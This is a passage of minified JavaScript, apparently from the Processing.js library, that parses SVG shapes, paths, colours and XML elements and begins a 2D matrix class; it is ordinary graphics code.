arguments[1]==="string"){if(arguments[1].indexOf(".svg")>-1){this.element=new cV.XMLElement(null,arguments[1]);this.vertexCodes=[];this.vertices=[];this.opacity=1;this.stroke=false;this.strokeColor=4278190080;this.strokeWeight=1;this.strokeCap="butt";this.strokeJoin="miter";this.strokeGradient="";this.strokeGradientPaint="";this.strokeName="";this.strokeOpacity=1;this.fill=true;this.fillColor=4278190080;this.fillGradient=null;this.fillGradientPaint=null;this.fillOpacity=1}}else{if(arguments[0]){this.element=arguments[1];this.vertexCodes=arguments[0].vertexCodes.slice();this.vertices=arguments[0].vertices.slice();this.stroke=arguments[0].stroke;this.strokeColor=arguments[0].strokeColor;this.strokeWeight=arguments[0].strokeWeight;this.strokeCap=arguments[0].strokeCap;this.strokeJoin=arguments[0].strokeJoin;this.strokeGradient=arguments[0].strokeGradient;this.strokeGradientPaint=arguments[0].strokeGradientPaint;this.strokeName=arguments[0].strokeName;this.fill=arguments[0].fill;this.fillColor=arguments[0].fillColor;this.fillGradient=arguments[0].fillGradient;this.fillGradientPaint=arguments[0].fillGradientPaint;this.fillName=arguments[0].fillName;this.strokeOpacity=arguments[0].strokeOpacity;this.fillOpacity=arguments[0].fillOpacity;this.opacity=arguments[0].opacity}}}}this.name=this.element.getStringAttribute("id");var d7=this.element.getStringAttribute("display","inline");this.visible=d7!=="none";var ec=this.element.getAttribute("transform");if(ec){this.matrix=this.parseMatrix(ec)}var d9=this.element.getStringAttribute("viewBox");if(d9!==null){var eb=d9.split(" ");this.width=eb[2];this.height=eb[3]}var d8=this.element.getStringAttribute("width");var ea=this.element.getStringAttribute("height");if(d8!==null){this.width=this.parseUnitSize(d8);this.height=this.parseUnitSize(ea)}else{if(this.width===0||this.height===0){this.width=1;this.height=1;throw"The width and/or height is not readable in the <svg> tag of this file."}}this.parseColors(this.element);this.parseChildren(this.element)};cq.prototype=new M;cq.prototype.parseMatrix=function(){function d7(d9){var d8=[];d9.replace(/\((.*?)\)/,function(){return function(ea,eb){d8=eb.replace(/,+/g," ").split(/\s+/)}}());return d8}return function(ef){this.checkMatrix(2);var d8=[];ef.replace(/\s*(\w+)\((.*?)\)/g,function(ei){d8.push(cV.trim(ei))});if(d8.length===0){return null}for(var ed=0,eb=d8.length;ed<eb;ed++){var d9=d7(d8[ed]);if(d8[ed].indexOf("matrix")!==-1){this.matrix.set(d9[0],d9[2],d9[4],d9[1],d9[3],d9[5])}else{if(d8[ed].indexOf("translate")!==-1){var ee=d9[0];var ec=d9.length===2?d9[1]:0;this.matrix.translate(ee,ec)}else{if(d8[ed].indexOf("scale")!==-1){var eh=d9[0];var eg=d9.length===2?d9[1]:d9[0];this.matrix.scale(eh,eg)}else{if(d8[ed].indexOf("rotate")!==-1){var ea=d9[0];if(d9.length===1){this.matrix.rotate(cV.radians(ea))}else{if(d9.length===3){this.matrix.translate(d9[1],d9[2]);this.matrix.rotate(cV.radians(d9[0]));this.matrix.translate(-d9[1],-d9[2])}}}else{if(d8[ed].indexOf("skewX")!==-1){this.matrix.skewX(parseFloat(d9[0]))}else{if(d8[ed].indexOf("skewY")!==-1){this.matrix.skewY(d9[0])}}}}}}}return this.matrix}}();cq.prototype.parseChildren=function(ec){var d8=ec.getChildren();var eb=new cV.PShape;for(var ea=0,d9=d8.length;ea<d9;ea++){var d7=this.parseChild(d8[ea]);if(d7){eb.addChild(d7)}}this.children.push(eb)};cq.prototype.getName=function(){return this.name};cq.prototype.parseChild=function(d9){var d8=d9.getName();var d7;if(d8==="g"){d7=new cq(this,d9)}else{if(d8==="defs"){d7=new cq(this,d9)}else{if(d8==="line"){d7=new cq(this,d9);d7.parseLine()}else{if(d8==="circle"){d7=new cq(this,d9);d7.parseEllipse(true)}else{if(d8==="ellipse"){d7=new cq(this,d9);d7.parseEllipse(false)}else{if(d8==="rect"){d7=new cq(this,d9);d7.parseRect()}else{if(d8==="polygon"){d7=new cq(this,d9);d7.parsePoly(true)}else{if(d8==="polyline"){d7=new cq(this,d9);d7.parsePoly(false)}else{if(d8==="path"){d7=new cq(this,d9);d7.parsePath()}else{if(d8==="radialGradient"){dt("PShapeSVG.prototype.parseChild, name = radialGradient")}else{if(d8==="linearGradient"){dt("PShapeSVG.prototype.parseChild, name = linearGradient")}else{if(d8==="text"){dt("PShapeSVG.prototype.parseChild, name = text")}else{if(d8==="filter"){dt("PShapeSVG.prototype.parseChild, name = filter")}else{if(d8==="mask"){dt("PShapeSVG.prototype.parseChild, name = mask")}else{E()}}}}}}}}}}}}}}return d7};cq.prototype.parsePath=function(){this.family=21;this.kind=0;var ec=[];var ew;var ev=cV.trim(this.element.getStringAttribute("d").replace(/[\s,]+/g," "));if(ev===null){return}ev=cV.__toCharArray(ev);var ea=0,d9=0,eh=0,ef=0,eg=0,ee=0,en=0,em=0,d8=0,d7=0,ej=0,ei=0,el=0,ek=0,eu=0,eq=0;var eo="";var es=[];var et=false;var ed;var eb;var er,ep;while(eu<ev.length){eq=ev[eu].valueOf();if(eq>=65&&eq<=90||eq>=97&&eq<=122){er=eu;eu++;if(eu<ev.length){es=[];eq=ev[eu].valueOf();while(!(eq>=65&&eq<=90||eq>=97&&eq<=100||eq>=102&&eq<=122)&&et===false){if(eq===32){if(eo!==""){es.push(parseFloat(eo));eo=""}eu++}else{if(eq===45){if(ev[eu-1].valueOf()===101){eo+=ev[eu].toString();eu++}else{if(eo!==""){es.push(parseFloat(eo))}eo=ev[eu].toString();eu++}}else{eo+=ev[eu].toString();eu++}}if(eu===ev.length){et=true}else{eq=ev[eu].valueOf()}}}if(eo!==""){es.push(parseFloat(eo));eo=""}eb=ev[er];eq=eb.valueOf();if(eq===77){if(es.length>=2&&es.length%2===0){ea=es[0];d9=es[1];this.parsePathMoveto(ea,d9);if(es.length>2){for(er=2,ep=es.length;er<ep;er+=2){ea=es[er];d9=es[er+1];this.parsePathLineto(ea,d9)}}}}else{if(eq===109){if(es.length>=2&&es.length%2===0){ea+=es[0];d9+=es[1];this.parsePathMoveto(ea,d9);if(es.length>2){for(er=2,ep=es.length;er<ep;er+=2){ea+=es[er];d9+=es[er+1];this.parsePathLineto(ea,d9)}}}}else{if(eq===76){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){ea=es[er];d9=es[er+1];this.parsePathLineto(ea,d9)}}}else{if(eq===108){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){ea+=es[er];d9+=es[er+1];this.parsePathLineto(ea,d9)}}}else{if(eq===72){for(er=0,ep=es.length;er<ep;er++){ea=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===104){for(er=0,ep=es.length;er<ep;er++){ea+=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===86){for(er=0,ep=es.length;er<ep;er++){d9=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===118){for(er=0,ep=es.length;er<ep;er++){d9+=es[er];this.parsePathLineto(ea,d9)}}else{if(eq===67){if(es.length>=6&&es.length%6===0){for(er=0,ep=es.length;er<ep;er+=6){eg=es[er];en=es[er+1];ee=es[er+2];em=es[er+3];d8=es[er+4];d7=es[er+5];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===99){if(es.length>=6&&es.length%6===0){for(er=0,ep=es.length;er<ep;er+=6){eg=ea+es[er];en=d9+es[er+1];ee=ea+es[er+2];em=d9+es[er+3];d8=ea+es[er+4];d7=d9+es[er+5];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===83){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){if(ed.toLowerCase()==="c"||ed.toLowerCase()==="s"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eg=el+(el-ej);en=ek+(ek-ei)}else{eg=this.vertices[this.vertices.length-1][0];en=this.vertices[this.vertices.length-1][1]}ee=es[er];em=es[er+1];d8=es[er+2];d7=es[er+3];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===115){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){if(ed.toLowerCase()==="c"||ed.toLowerCase()==="s"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eg=el+(el-ej);en=ek+(ek-ei)}else{eg=this.vertices[this.vertices.length-1][0];en=this.vertices[this.vertices.length-1][1]}ee=ea+es[er];em=d9+es[er+1];d8=ea+es[er+2];d7=d9+es[er+3];this.parsePathCurveto(eg,en,ee,em,d8,d7);ea=d8;d9=d7}}}else{if(eq===81){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){eh=es[er];ef=es[er+1];d8=es[er+2];d7=es[er+3];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===113){if(es.length>=4&&es.length%4===0){for(er=0,ep=es.length;er<ep;er+=4){eh=ea+es[er];ef=d9+es[er+1];d8=ea+es[er+2];d7=d9+es[er+3];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===84){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){if(ed.toLowerCase()==="q"||ed.toLowerCase()==="t"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eh=el+(el-ej);ef=ek+(ek-ei)}else{eh=ea;ef=d9}d8=es[er];d7=es[er+1];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===116){if(es.length>=2&&es.length%2===0){for(er=0,ep=es.length;er<ep;er+=2){if(ed.toLowerCase()==="q"||ed.toLowerCase()==="t"){ej=this.vertices[this.vertices.length-2][0];ei=this.vertices[this.vertices.length-2][1];el=this.vertices[this.vertices.length-1][0];ek=this.vertices[this.vertices.length-1][1];eh=el+(el-ej);ef=ek+(ek-ei)}else{eh=ea;ef=d9}d8=ea+es[er];d7=d9+es[er+1];this.parsePathQuadto(ea,d9,eh,ef,d8,d7);ea=d8;d9=d7}}}else{if(eq===90||eq===122){this.close=true}}}}}}}}}}}}}}}}}ed=eb.toString()}else{eu++}}};cq.prototype.parsePathQuadto=function(d9,eb,d7,ec,d8,ea){if(this.vertices.length>0){this.parsePathCode(1);this.parsePathVertex(d9+(d7-d9)*2/3,eb+(ec-eb)*2/3);this.parsePathVertex(d8+(d7-d8)*2/3,ea+(ec-ea)*2/3);this.parsePathVertex(d8,ea)}else{throw"Path must start with M/m"}};cq.prototype.parsePathCurveto=function(ea,ec,d8,eb,d7,d9){if(this.vertices.length>0){this.parsePathCode(1);this.parsePathVertex(ea,ec);this.parsePathVertex(d8,eb);this.parsePathVertex(d7,d9)}else{throw"Path must start with M/m"}};cq.prototype.parsePathLineto=function(d8,d7){if(this.vertices.length>0){this.parsePathCode(0);this.parsePathVertex(d8,d7);this.vertices[this.vertices.length-1]["moveTo"]=false}else{throw"Path must start with M/m"}};cq.prototype.parsePathMoveto=function(d8,d7){if(this.vertices.length>0){this.parsePathCode(3)}this.parsePathCode(0);this.parsePathVertex(d8,d7);this.vertices[this.vertices.length-1]["moveTo"]=true};cq.prototype.parsePathVertex=function(d7,d9){var d8=[];d8[0]=d7;d8[1]=d9;this.vertices.push(d8)};cq.prototype.parsePathCode=function(d7){this.vertexCodes.push(d7)};cq.prototype.parsePoly=function(eb){this.family=21;this.close=eb;var d8=cV.trim(this.element.getStringAttribute("points").replace(/[,\s]+/g," "));if(d8!==null){var d7=d8.split(" ");if(d7.length%2===0){for(var ea=0,d9=d7.length;ea<d9;ea++){var ec=[];ec[0]=d7[ea];ec[1]=d7[++ea];this.vertices.push(ec)}}else{throw"Error parsing polygon points: odd number of coordinates provided"}}};cq.prototype.parseRect=function(){this.kind=30;this.family=1;this.params=[];this.params[0]=this.element.getFloatAttribute("x");this.params[1]=this.element.getFloatAttribute("y");this.params[2]=this.element.getFloatAttribute("width");this.params[3]=this.element.getFloatAttribute("height");if(this.params[2]<0||this.params[3]<0){throw"svg error: negative width or height found while parsing <rect>"}};cq.prototype.parseEllipse=function(d9){this.kind=31;this.family=1;this.params=[];this.params[0]=this.element.getFloatAttribute("cx")|0;this.params[1]=this.element.getFloatAttribute("cy")|0;var d8,d7;if(d9){d8=d7=this.element.getFloatAttribute("r");if(d8<0){throw"svg error: negative radius found while parsing <circle>"}}else{d8=this.element.getFloatAttribute("rx");d7=this.element.getFloatAttribute("ry");if(d8<0||d7<0){throw"svg error: negative x-axis radius or y-axis radius found while parsing <ellipse>"}}this.params[0]-=d8;this.params[1]-=d7;this.params[2]=d8*2;this.params[3]=d7*2};cq.prototype.parseLine=function(){this.kind=4;this.family=1;this.params=[];this.params[0]=this.element.getFloatAttribute("x1");this.params[1]=this.element.getFloatAttribute("y1");this.params[2]=this.element.getFloatAttribute("x2");this.params[3]=this.element.getFloatAttribute("y2")};cq.prototype.parseColors=function(d9){if(d9.hasAttribute("opacity")){this.setOpacity(d9.getAttribute("opacity"))}if(d9.hasAttribute("stroke")){this.setStroke(d9.getAttribute("stroke"))}if(d9.hasAttribute("stroke-width")){this.setStrokeWeight(d9.getAttribute("stroke-width"))}if(d9.hasAttribute("stroke-linejoin")){this.setStrokeJoin(d9.getAttribute("stroke-linejoin"))}if(d9.hasAttribute("stroke-linecap")){this.setStrokeCap(d9.getStringAttribute("stroke-linecap"))}if(d9.hasAttribute("fill")){this.setFill(d9.getStringAttribute("fill"))}if(d9.hasAttribute("style")){var ec=d9.getStringAttribute("style");var ea=ec.toString().split(";");for(var d8=0,d7=ea.length;d8<d7;d8++){var eb=cV.trim(ea[d8].split(":"));if(eb[0]==="fill"){this.setFill(eb[1])}else{if(eb[0]==="fill-opacity"){this.setFillOpacity(eb[1])}else{if(eb[0]==="stroke"){this.setStroke(eb[1])}else{if(eb[0]==="stroke-width"){this.setStrokeWeight(eb[1])}else{if(eb[0]==="stroke-linecap"){this.setStrokeCap(eb[1])}else{if(eb[0]==="stroke-linejoin"){this.setStrokeJoin(eb[1])}else{if(eb[0]==="stroke-opacity"){this.setStrokeOpacity(eb[1])}else{if(eb[0]==="opacity"){this.setOpacity(eb[1])}}}}}}}}}}};cq.prototype.setFillOpacity=function(d7){this.fillOpacity=parseFloat(d7);this.fillColor=this.fillOpacity*255<<24|this.fillColor&16777215};cq.prototype.setFill=function(d7){var d8=this.fillColor&4278190080;if(d7==="none"){this.fill=false}else{if(d7.indexOf("#")===0){this.fill=true;if(d7.length===4){d7=d7.replace(/#(.)(.)(.)/,"#$1$1$2$2$3$3")}this.fillColor=d8|parseInt(d7.substring(1),16)&16777215}else{if(d7.indexOf("rgb")===0){this.fill=true;this.fillColor=d8|this.parseRGB(d7)}else{if(d7.indexOf("url(#")===0){this.fillName=d7.substring(5,d7.length-1)}else{if(C[d7]){this.fill=true;this.fillColor=d8|parseInt(C[d7].substring(1),16)&16777215}}}}}};cq.prototype.setOpacity=function(d7){this.strokeColor=parseFloat(d7)*255<<24|this.strokeColor&16777215;this.fillColor=parseFloat(d7)*255<<24|this.fillColor&16777215};cq.prototype.setStroke=function(d7){var d8=this.strokeColor&4278190080;if(d7==="none"){this.stroke=false}else{if(d7.charAt(0)==="#"){this.stroke=true;if(d7.length===4){d7=d7.replace(/#(.)(.)(.)/,"#$1$1$2$2$3$3")}this.strokeColor=d8|parseInt(d7.substring(1),16)&16777215}else{if(d7.indexOf("rgb")===0){this.stroke=true;this.strokeColor=d8|this.parseRGB(d7)}else{if(d7.indexOf("url(#")===0){this.strokeName=d7.substring(5,d7.length-1)}else{if(C[d7]){this.stroke=true;this.strokeColor=d8|parseInt(C[d7].substring(1),16)&16777215}}}}}};cq.prototype.setStrokeWeight=function(d7){this.strokeWeight=this.parseUnitSize(d7)};cq.prototype.setStrokeJoin=function(d7){if(d7==="miter"){this.strokeJoin="miter"}else{if(d7==="round"){this.strokeJoin="round"}else{if(d7==="bevel"){this.strokeJoin="bevel"}}}};cq.prototype.setStrokeCap=function(d7){if(d7==="butt"){this.strokeCap="butt"}else{if(d7==="round"){this.strokeCap="round"}else{if(d7==="square"){this.strokeCap="square"}}}};cq.prototype.setStrokeOpacity=function(d7){this.strokeOpacity=parseFloat(d7);this.strokeColor=this.strokeOpacity*255<<24|this.strokeColor&16777215};cq.prototype.parseRGB=function(d8){var d9=d8.substring(d8.indexOf("(")+1,d8.indexOf(")"));var d7=d9.split(", ");return d7[0]<<16|d7[1]<<8|d7[2]};cq.prototype.parseUnitSize=function(d8){var d7=d8.length-2;if(d7<0){return d8}if(d8.indexOf("pt")===d7){return parseFloat(d8.substring(0,d7))*1.25}if(d8.indexOf("pc")===d7){return parseFloat(d8.substring(0,d7))*15}if(d8.indexOf("mm")===d7){return parseFloat(d8.substring(0,d7))*3.543307}if(d8.indexOf("cm")===d7){return parseFloat(d8.substring(0,d7))*35.43307}if(d8.indexOf("in")===d7){return parseFloat(d8.substring(0,d7))*90}if(d8.indexOf("px")===d7){return parseFloat(d8.substring(0,d7))}return parseFloat(d8)};cV.shape=function(d9,d8,eb,ea,d7){if(arguments.length>=1&&arguments[0]!==null){if(d9.isVisible()){cV.pushMatrix();if(Q===3){if(arguments.length===5){cV.translate(d8-ea/2,eb-d7/2);cV.scale(ea/d9.getWidth(),d7/d9.getHeight())}else{if(arguments.length===3){cV.translate(d8-d9.getWidth()/2,-d9.getHeight()/2)}else{cV.translate(-d9.getWidth()/2,-d9.getHeight()/2)}}}else{if(Q===0){if(arguments.length===5){cV.translate(d8,eb);cV.scale(ea/d9.getWidth(),d7/d9.getHeight())}else{if(arguments.length===3){cV.translate(d8,eb)}}}else{if(Q===1){if(arguments.length===5){ea-=d8;d7-=eb;cV.translate(d8,eb);cV.scale(ea/d9.getWidth(),d7/d9.getHeight())}else{if(arguments.length===3){cV.translate(d8,eb)}}}}}d9.draw();if(arguments.length===1&&Q===3||arguments.length>1){cV.popMatrix()}}}};cV.shapeMode=function(d7){Q=d7};cV.loadShape=function(d7){if(arguments.length===1){if(d7.indexOf(".svg")>-1){return new cq(null,d7)}}return null};var cS=function(eb,ea,d7,d8,d9){this.fullName=eb||"";this.name=ea||"";this.namespace=d7||"";this.value=d8;this.type=d9};cS.prototype={getName:function(){return this.name},getFullName:function(){return this.fullName},getNamespace:function(){return this.namespace},getValue:function(){return this.value},getType:function(){return this.type},setValue:function(d7){this.value=d7}};var b8=cV.XMLElement=function(){this.attributes=[];this.children=[];this.fullName=null;this.name=null;this.namespace="";this.content=null;this.parent=null;this.lineNr="";this.systemID="";this.type="ELEMENT";if(arguments.length===4){this.fullName=arguments[0]||"";if(arguments[1]){this.name=arguments[1]}else{var d7=this.fullName.indexOf(":");if(d7>=0){this.name=this.fullName.substring(d7+1)}else{this.name=this.fullName}}this.namespace=arguments[1];this.lineNr=arguments[3];this.systemID=arguments[2]}else{if(arguments.length===2&&arguments[1].indexOf(".")>-1){this.parse(arguments[arguments.length-1])}else{if(arguments.length===1&&typeof arguments[0]==="string"){this.parse(arguments[0])}}}};b8.prototype={parse:function(d7){var d9;try{var eb=d7.substring(d7.length-4);if(eb===".xml"||eb===".svg"){d7=u(d7)}d9=(new DOMParser).parseFromString(d7,"text/xml");var d8=d9.documentElement;if(d8){this.parseChildrenRecursive(null,d8)}else{throw"Error loading document"}return this}catch(ea){throw ea}},parseChildrenRecursive:function(ef,ed){var ec,d8,ee,eb,ea,d7;if(!ef){this.fullName=ed.localName;this.name=ed.nodeName;ec=this}else{ec=new b8(ed.localName,ed.nodeName,"","");ec.parent=ef}if(ed.nodeType===3&&ed.textContent!==""){return this.createPCDataElement(ed.textContent)}for(eb=0,ea=ed.attributes.length;eb<ea;eb++){ee=ed.attributes[eb];d8=new cS(ee.getname,ee.nodeName,ee.namespaceURI,ee.nodeValue,ee.nodeType);ec.attributes.push(d8)}for(eb=0,ea=ed.childNodes.length;eb<ea;eb++){var d9=ed.childNodes[eb];if(d9.nodeType===1||d9.nodeType===3){d7=ec.parseChildrenRecursive(ec,d9);if(d7!==null){ec.children.push(d7)}}}return ec},createElement:function(){if(arguments.length===2){return new b8(arguments[0],arguments[1],null,null)}return new b8(arguments[0],arguments[1],arguments[2],arguments[3])},createPCDataElement:function(d7){if(d7.replace(/^\s+$/g,"")===""){return null}var d8=new b8;d8.content=d7;d8.type="TEXT";return d8},hasAttribute:function(){if(arguments.length===1){return this.getAttribute(arguments[0])!==null}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])!==null}},equals:function(ec){if(!(ec instanceof b8)){return false}var d9,d8;if(this.name!==ec.getLocalName()){return false}if(this.attributes.length!==ec.getAttributeCount()){return false}if(this.attributes.length!==ec.attributes.length){return false}var eg,ee,d7,ed,ef;for(d9=0,d8=this.attributes.length;d9<d8;d9++){eg=this.attributes[d9].getName();ee=this.attributes[d9].getNamespace();ef=ec.findAttribute(eg,ee);if(ef===null){return false}if(this.attributes[d9].getValue()!==ef.getValue()){return false}if(this.attributes[d9].getType()!==ef.getType()){return false}}if(this.children.length!==ec.getChildCount()){return false}if(this.children.length>0){var eb,ea;for(d9=0,d8=this.children.length;d9<d8;d9++){eb=this.getChild(d9);ea=ec.getChild(d9);if(!eb.equals(ea)){return false}}return true}return this.content===ec.content},getContent:function(){if(this.type==="TEXT"){return this.content}var d7=this.children;if(d7.length===1&&d7[0].type==="TEXT"){return d7[0].content}return null},getAttribute:function(){var d7;if(arguments.length===2){d7=this.findAttribute(arguments[0]);if(d7){return d7.getValue()}return arguments[1]}else{if(arguments.length===1){d7=this.findAttribute(arguments[0]);if(d7){return d7.getValue()}return null}else{if(arguments.length===3){d7=this.findAttribute(arguments[0],arguments[1]);if(d7){return d7.getValue()}return arguments[2]}}}},getStringAttribute:function(){if(arguments.length===1){return this.getAttribute(arguments[0])}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])}return this.getAttribute(arguments[0],arguments[1],arguments[2])},getString:function(d7){return this.getStringAttribute(d7)},getFloatAttribute:function(){if(arguments.length===1){return parseFloat(this.getAttribute(arguments[0],0))}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])}return this.getAttribute(arguments[0],arguments[1],arguments[2])},getFloat:function(d7){return this.getFloatAttribute(d7)},getIntAttribute:function(){if(arguments.length===1){return this.getAttribute(arguments[0],0)}if(arguments.length===2){return this.getAttribute(arguments[0],arguments[1])}return this.getAttribute(arguments[0],arguments[1],arguments[2])},getInt:function(d7){return this.getIntAttribute(d7)},hasChildren:function(){return this.children.length>0},addChild:function(d7){if(d7!==null){d7.parent=this;this.children.push(d7)}},insertChild:function(d9,d7){if(d9){if(d9.getLocalName()===null&&!this.hasChildren()){var d8=this.children[this.children.length-1];if(d8.getLocalName()===null){d8.setContent(d8.getContent()+d9.getContent());return}}d9.parent=this;this.children.splice(d7,0,d9)}},getChild:function(){if(typeof arguments[0]==="number"){return this.children[arguments[0]]}if(arguments[0].indexOf("/")!==-1){this.getChildRecursive(arguments[0].split("/"),0);return null}var d7,ea;for(var d9=0,d8=this.getChildCount();d9<d8;d9++){d7=this.getChild(d9);ea=d7.getName();if(ea!==null&&ea===arguments[0]){return d7}}return null},getChildren:function(){if(arguments.length===1){if(typeof arguments[0]==="number"){return this.getChild(arguments[0])}if(arguments[0].indexOf("/")!==-1){return this.getChildrenRecursive(arguments[0].split("/"),0)}var eb=[];var d7,ea;for(var d9=0,d8=this.getChildCount();d9<d8;d9++){d7=this.getChild(d9);ea=d7.getName();if(ea!==null&&ea===arguments[0]){eb.push(d7)}}return eb}return this.children},getChildCount:function(){return this.children.length},getChildRecursive:function(d8,ec){var d7,eb;for(var ea=0,d9=this.getChildCount();ea<d9;ea++){d7=this.getChild(ea);eb=d7.getName();if(eb!==null&&eb===d8[ec]){if(ec===d8.length-1){return d7}ec+=1;return d7.getChildRecursive(d8,ec)}}return null},getChildrenRecursive:function(d7,eb){if(eb===d7.length-1){return this.getChildren(d7[eb])}var ea=this.getChildren(d7[eb]);var d9=[];for(var d8=0;d8<ea.length;d8++){d9=d9.concat(ea[d8].getChildrenRecursive(d7,eb+1))}return d9},isLeaf:function(){return !this.hasChildren()},listChildren:function(){var d7=[];for(var d9=0,d8=this.children.length;d9<d8;d9++){d7.push(this.getChild(d9).getName())}return d7},removeAttribute:function(d8,ea){this.namespace=ea||"";for(var d9=0,d7=this.attributes.length;d9<d7;d9++){if(this.attributes[d9].getName()===d8&&this.attributes[d9].getNamespace()===this.namespace){this.attributes.splice(d9,1);break}}},removeChild:function(d9){if(d9){for(var d8=0,d7=this.children.length;d8<d7;d8++){if(this.children[d8].equals(d9)){this.children.splice(d8,1);break}}}},removeChildAtIndex:function(d7){if(this.children.length>d7){this.children.splice(d7,1)}},findAttribute:function(d8,ea){this.namespace=ea||"";for(var d9=0,d7=this.attributes.length;d9<d7;d9++){if(this.attributes[d9].getName()===d8&&this.attributes[d9].getNamespace()===this.namespace){return this.attributes[d9]}}return null},setAttribute:function(){var d7;if(arguments.length===3){var d9=arguments[0].indexOf(":");var d8=arguments[0].substring(d9+1);d7=this.findAttribute(d8,arguments[1]);if(d7){d7.setValue(arguments[2])}else{d7=new cS(arguments[0],d8,arguments[1],arguments[2],"CDATA");this.attributes.push(d7)}}else{d7=this.findAttribute(arguments[0]);if(d7){d7.setValue(arguments[1])}else{d7=new cS(arguments[0],arguments[0],null,arguments[1],"CDATA");this.attributes.push(d7)}}},setString:function(d7,d8){this.setAttribute(d7,d8)},setInt:function(d7,d8){this.setAttribute(d7,d8)},setFloat:function(d7,d8){this.setAttribute(d7,d8)},setContent:function(d7){if(this.children.length>0){D.debug("Tried to set content for XMLElement with children")}this.content=d7},setName:function(){if(arguments.length===1){this.name=arguments[0];this.fullName=arguments[0];this.namespace=null}else{var d7=arguments[0].indexOf(":");if(arguments[1]===null||d7<0){this.name=arguments[0]}else{this.name=arguments[0].substring(d7+1)}this.fullName=arguments[0];this.namespace=arguments[1]}},getName:function(){return this.fullName},getLocalName:function(){return this.name},getAttributeCount:function(){return this.attributes.length},toString:function(){if(this.type==="TEXT"){return this.content}var d9=(this.namespace!==""&&this.namespace!==this.name?this.namespace+":":"")+this.name;var ea="<"+d9;var d8,eb;for(d8=0;d8<this.attributes.length;d8++){var d7=this.attributes[d8];ea+=" "+d7.getName()+'="'+d7.getValue()+'"'}if(this.children.length===0){if(this.content===""){ea+="/>"}else{ea+=">"+this.content+"</"+d9+">"}}else{ea+=">";for(eb=0;eb<this.children.length;eb++){ea+=this.children[eb].toString()}ea+="</"+d9+">"}return ea}};b8.parse=function(d8){var d7=new b8;d7.parse(d8);return d7};var cl=function(ea){var d7=0;for(var d8=0;d8<ea.length;d8++){if(d8!==0){d7=o.max(d7,o.abs(ea[d8]))}else{d7=o.abs(ea[d8])}}var d9=(d7+"").indexOf(".");if(d9===0){d9=1}else{if(d9===-1){d9=(d7+"").length}}return d9};var aT=cV.PMatrix2D=function(){if(arguments.length===0){this.reset()}else{if(arguments.length===1&&arguments[0] instanceof aT){this.set(arguments[0].array())}else{if(arguments.length===6){this.set(arguments[0],arguments[1],arguments[2],arguments[3],arguments[4],arguments[5])}}}};aT.prototype={set:function(){if(arguments.length===6){var d7=arguments;this.set([d7[0],d7[1],d7[2],d7[3],d7[4],d7[5]])}else{if(arguments.length===1&&arguments[0] instanceof aT){this.elements=arguments[0].array()}else{if(arguments.length===1&&arguments[0] instanceof Array){this.elements=arguments[0].slice()}}}},get:function(){var d7=new aT;d7.set(this.elements);return d7},reset:function(){this.set([1,0,0,0,1,0])},array:function aD(){return this.elements.slice()},translate:function(d8,d7){this.elements[2]=d8*this.elements[0]+d7*this.elements[1]+this.elements[2];this.elements[5]=d8*this.elements[3]+d7*this.elements[4]+this.elements[5]},invTranslate:function(d8,d7){this.translate(-d8,-d7)},transpose:function(){},mult:function(d8,d9){var d7,ea;if(d8 instanceof y){d7=d8.x;ea=d8.y;if(!d9){d9=new y}}else{if(d8 instanceof Array){d7=d8[0];ea=d8[1];if(!d9){d9=[]}}}if(d9 instanceof Array){d9[0]=this.elements[0]*d7+this.elements[1]*ea+this.elements[2];d9[1]=this.elements[3]*d7+this.elements[4]*ea+this.elements[5]}else{if(d9 instanceof y){d9.x=this.elements[0]*d7+this.elements[1]*ea+this.elements[2];d9.y=this.elements[3]*d7+this.elements[4]*ea+this.elements[5];d9.z=0}}return d9},multX:function(d7,d8){return d7*this.elements[0]+d8*this.elements[1]+this.elements[2]},multY:function(d7,d8){return d7*this.elements[3]+d8*this.elements[4]+this.elements[5]},skewX:function(d7){this.apply(1,0,1,d7,0,0)},skewY:function(d7){this.apply(1,0,1,0,d7,0)},determinant:function(){return this.elements[0]*this.elements[4]-this.elements[1]*this.elements[3]},invert:function(){var ec=this.determinant();if(o.abs(ec)>-2147483648){var d8=this.elements[0];var ed=this.elements[1];var eb=this.elements[2];var ea=this.elements[3];var d9=this.elements[4];var d7=this.elements[5];this.elements[0]=d9/ec;this.elements[3]=-ea/ec;this.elements[1]=-ed/ec;this.elements[4]=d8/ec;this.elements[2]=(ed*d7-d9*eb)/ec;this.elements[5]=(ea*eb-d8*d7)/ec;return true}return false},scale:function(d8,d7){if(d8&&!d7){d7=d8}if(d8&&d7){this.elements[0]*=d8;this.elements[1]*=d7;this.elements[3]*=d8;this.elements[4]*=d7}},invScale:function(d8,d7){if(d8&&!d7){d7=d8}this.scale(1/d8,1/d7)},apply:function(){var d9;if(arguments.length===1&&arguments[0] instanceof 